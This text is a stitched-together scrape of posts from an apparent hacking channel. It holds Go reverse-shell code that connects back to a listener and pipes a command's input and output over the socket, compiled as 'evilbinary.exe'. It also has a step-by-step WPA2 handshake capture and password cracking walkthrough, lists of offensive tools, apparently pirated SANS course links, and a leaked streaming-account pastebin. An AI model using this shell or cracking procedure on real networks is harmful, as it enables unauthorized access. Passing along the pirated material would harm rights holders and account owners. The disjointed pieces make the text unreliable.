A Reverse HTTP Shell In Kali Linux:
HERE'S WHAT YOU NEED:
1) Kali Linux Virtual Instance (VirtualBox)
2) Windows 10 Virtual Instance (VirtualBox) -OR-
3) Linux Virtual Instance (VirtualBox)
4) Here is the code for my program, in a file named tcpServer.go:
package main

import (
	"bufio"
	"fmt"
	"log"
	"net"
	"os/exec"
	"strings"
)

const (
	RPORT = "4444"
)

// CheckErr aborts the program, printing the error, when e is non-nil.
func CheckErr(e error) {
	if e != nil {
		log.Fatalf("Error %s", e)
	}
}

func main() {
	// connect back to the listener at 10.0.2.5 on RPORT
	conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT))
	CheckErr(err)
	// read one line from the connection; that line is the command to run
	remoteCmd, err := bufio.NewReader(conn).ReadString('\n')
	CheckErr(err)
	// remove newline character
	newCmd := strings.TrimSuffix(remoteCmd, "\n")
	command := exec.Command(newCmd)
	// wire the command's stdin, stdout and stderr to the socket
	command.Stdin = conn
	command.Stdout = conn
	command.Stderr = conn
	command.Run()
}
After putting together the program, I need to compile the client for Windows for my Windows target. This is how it is done:
> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
2) The program works fine, but it is still primitive: it cannot handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY
4) If you don't agree with the preceding statement, try setting flags in C#... Flags in Go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your
5) Here is a basic example of checking for arguments passed via the command line to our program:
// needs "fmt" and "os" imported in tcpServer.go
func main() {
	// read args; os.Args[0] is the program name, so a length of 1 means nothing was passed
	arguments := os.Args
	if len(arguments) == 1 {
		fmt.Println("Not enough arguments!")
		return
	}
}
> 1 macbook$ go run tcpServer.go -p 4444
6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output "Listening on 4444...", because the value of the pointer to the string flag variable has been set to 4444.
LPORT := flag.String("p", "", "port to listen on")
// flag.Parse() must run before *LPORT is read; until then it still holds the default ""
flag.Parse()
fmt.Printf("lport is %s\n", *LPORT)
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT))
CheckErr(err)
defer l.Close()
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)
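As an added example (not code from the original post), here is the listener's argument handling done with a private flag.FlagSet so it can be unit-tested, rejecting the unexpected input the snippet above lets through: a missing -p, a non-numeric port, or a port outside 1-65535. ListenConfig, ParseListenArgs and the -b bind flag are names introduced here, not from the page.

```go
package main

import (
	"errors"
	"flag"
	"fmt"
	"net"
	"os"
	"strconv"
)

// ListenConfig is the validated result of parsing the listener's command line.
type ListenConfig struct {
	Host string
	Port int
}

// Addr returns the host:port string to hand to net.Listen.
func (c ListenConfig) Addr() string {
	return net.JoinHostPort(c.Host, strconv.Itoa(c.Port))
}

// ParseListenArgs parses "-p PORT" and "-b ADDR" from args (os.Args without the
// program name). A private FlagSet with ContinueOnError is used instead of the
// package-level flag functions so that bad input comes back as an error the
// caller can handle (and the function can be tested) rather than exiting.
func ParseListenArgs(args []string) (ListenConfig, error) {
	fs := flag.NewFlagSet("listener", flag.ContinueOnError)
	port := fs.String("p", "", "port to listen on (required)")
	host := fs.String("b", "127.0.0.1", "address to bind to")
	if err := fs.Parse(args); err != nil {
		return ListenConfig{}, err // unknown flag, missing value, or -h
	}
	// *port only holds the user's value after fs.Parse has run.
	if *port == "" {
		return ListenConfig{}, errors.New("-p is required")
	}
	n, err := strconv.Atoi(*port)
	if err != nil {
		return ListenConfig{}, fmt.Errorf("port %q is not a number", *port)
	}
	if n < 1 || n > 65535 {
		return ListenConfig{}, fmt.Errorf("port %d is outside 1-65535", n)
	}
	if net.ParseIP(*host) == nil {
		return ListenConfig{}, fmt.Errorf("bind address %q is not an IP address", *host)
	}
	return ListenConfig{Host: *host, Port: n}, nil
}

func main() {
	cfg, err := ParseListenArgs(os.Args[1:])
	if err != nil {
		fmt.Fprintln(os.Stderr, "error:", err)
		os.Exit(2)
	}
	l, err := net.Listen("tcp4", cfg.Addr())
	if err != nil {
		fmt.Fprintln(os.Stderr, "listen:", err)
		os.Exit(1)
	}
	defer l.Close()
	fmt.Printf("Listening on %s for incoming connections\n", cfg.Addr())
}
```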
@UndercodeTesting
Greatest 2020 Hacking tools - tracking, backdoors and more...
0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/
3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d
acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/
Spyse OSINT gathering tool that scans the entire web, enriches and collects all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/
findsubdomains Complete subdomain scanning service (works using OSINT). https://findsubdomains.com
sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r
ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html
admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html
@UndercodeTesting
TOPIC HACKING COURSES & TOOLS 2020:
SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY
@UndercodeTesting
X56 HULU PREMIUM
> provide a screenshot after login to @Undercode_bot
pastebin.com/9HdcwYHN
So you want to build your own tools?
That's great!
1) tabs: please use tabs instead of aligning code with spaces; tabs are much more flexible when making modifications to code, are program-independent (some programs will remove spaces) and are more readable.
2) context: if you have settings or anything else you want to make available for later use, you can make use of the context array: $_CONTEXT
This is an array, so make sure the key doesn't already exist; if you're not sure whether the key has been set, just dump the context array in your script:
var_export($_CONTEXT);
paths: if you want to make shortcuts to (http) files you can add them to $_PATHS, which contains the paths (basically shortcuts) and is also an array.
Again, if you want to add new items to this array, make sure they aren't already defined, by dumping it in your script:
var_export($_PATHS);
3) buffer output: unless you are building a hacksuite app or you're using the hacksuite to feed your application, you must buffer the output in $sCode until the script ends.
4) functions: use the functions in the Functions folder as much as possible rather than creating new ones.
folder consistency: always make sure that you put new files into folders that make sense.
variable naming: you're not exactly forced to do this, but since most of the suite is coded like this it's recommended to follow the structure below.
boolean: bSomeVar
string: sSomeVar
array: aSomeVar
integer: iSomeVar
double: dSomeVar
resource: rConnect
object: oSomeObject
object from selfmade class: cSomeObject
5) As you can see, this makes the code more readable and you can tell right away what type the variable contains.
Protect include files
You also need to protect your include files from being accessed directly. You can do this by simply checking if the constant IN_SCRIPT has been defined.
// refuse direct requests: only the entry script defines IN_SCRIPT before including this file
if (!defined('IN_SCRIPT')) {
    exit;
}
6) You can put this code at the start of the code in all of your include files.
@UndercodeTesting
Hack Wi-Fi topic article on git:
1) Cracking a Wi-Fi Network
Monitor Mode
Begin by listing wireless interfaces that support monitor mode with:
> airmon-ng
2) If you do not see an interface listed, then your wireless card does not support monitor mode.
3) This assumes your wireless interface name is wlan0, but be sure to use the correct name if it differs. Next, we will place the interface into monitor mode:
> airmon-ng start wlan0
4) Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
5) Find Your Target
6) Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
7) You should see output similar to what is below.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
8) For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.
9) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
11) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
12) If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect by sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
13) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
14) Crack the Network Password
The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
15) Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
16) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
> cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
19) Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
20) Where the last two fields separated by : are the network name and password respectively.
21) If you would like to use hashcat without naive-hashcat see this page for info.
Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:
# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note that if the network password is not in the wordlist, you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Example: Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
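As an added example (not part of the article above), a Go parser for the airodump-ng access-point table shown in step 7, written from the survey-your-own-network side: it handles rows where the CIPHER or AUTH column is absent and the hidden-SSID "<length: 0>" marker, and WeakAPs flags open, WEP, WPA1 and TKIP networks for review. The sample table is constructed from the rows above plus one extra row with a spaced ESSID; AccessPoint, ParseAirodump and WeakAPs are names introduced here.

```go
package main

import (
	"fmt"
	"net"
	"strconv"
	"strings"
)

// AccessPoint is one row of the airodump-ng access-point table.
type AccessPoint struct {
	BSSID   string
	Power   int    // PWR (dBm)
	Channel int    // CH
	Enc     string // OPN, WEP, WPA, WPA2 ...
	Cipher  string // CCMP, TKIP ...; empty for open networks
	Auth    string // PSK, MGT ...; empty until airodump-ng has seen a client authenticate
	ESSID   string
	Hidden  bool // airodump-ng prints "<length: N>" when the SSID is not broadcast
}

// sampleAirodump is a constructed screen dump in the layout shown above (not a
// real capture); the last row is added to show an ESSID containing spaces.
const sampleAirodump = `CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
00:11:22:33:44:55 -70 10 0 0 6 54e WPA2 CCMP PSK Coffee Shop Guest
`

var knownCiphers = map[string]bool{"CCMP": true, "TKIP": true, "WEP": true, "WEP40": true, "WEP104": true, "GCMP": true}
var knownAuths = map[string]bool{"PSK": true, "MGT": true, "SAE": true, "OPN": true, "SKA": true}

// ParseAirodump parses the access-point rows of an airodump-ng screen dump. CIPHER
// and AUTH are optional columns (an open network has neither; a WPA2 network with
// no client seen yet has no AUTH), so the tail after ENC is matched against known
// cipher/auth names and whatever is left is the ESSID, which may contain spaces.
func ParseAirodump(out string) ([]AccessPoint, error) {
	var aps []AccessPoint
	for _, line := range strings.Split(out, "\n") {
		f := strings.Fields(line)
		if len(f) < 8 {
			continue // blank or banner line
		}
		if _, err := net.ParseMAC(f[0]); err != nil {
			continue // column header: first field is not a MAC address
		}
		pwr, err := strconv.Atoi(f[1])
		if err != nil {
			return nil, fmt.Errorf("bad PWR %q for %s", f[1], f[0])
		}
		ch, err := strconv.Atoi(f[5])
		if err != nil {
			return nil, fmt.Errorf("bad CH %q for %s", f[5], f[0])
		}
		ap := AccessPoint{BSSID: f[0], Power: pwr, Channel: ch, Enc: f[7]}
		rest := f[8:]
		if len(rest) > 0 && knownCiphers[rest[0]] {
			ap.Cipher, rest = rest[0], rest[1:]
		}
		if len(rest) > 0 && knownAuths[rest[0]] {
			ap.Auth, rest = rest[0], rest[1:]
		}
		ap.ESSID = strings.Join(rest, " ")
		ap.Hidden = strings.HasPrefix(ap.ESSID, "<length:")
		aps = append(aps, ap)
	}
	return aps, nil
}

// WeakAPs returns the BSSIDs a site survey should flag: open, WEP, WPA1 or TKIP.
func WeakAPs(aps []AccessPoint) []string {
	var out []string
	for _, ap := range aps {
		if ap.Enc == "OPN" || ap.Enc == "WEP" || ap.Enc == "WPA" || ap.Cipher == "TKIP" {
			out = append(out, ap.BSSID)
		}
	}
	return out
}

func main() {
	aps, err := ParseAirodump(sampleAirodump)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%d access points parsed; flag for review: %v\n", len(aps), WeakAPs(aps))
}
```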
@UndercodeTesting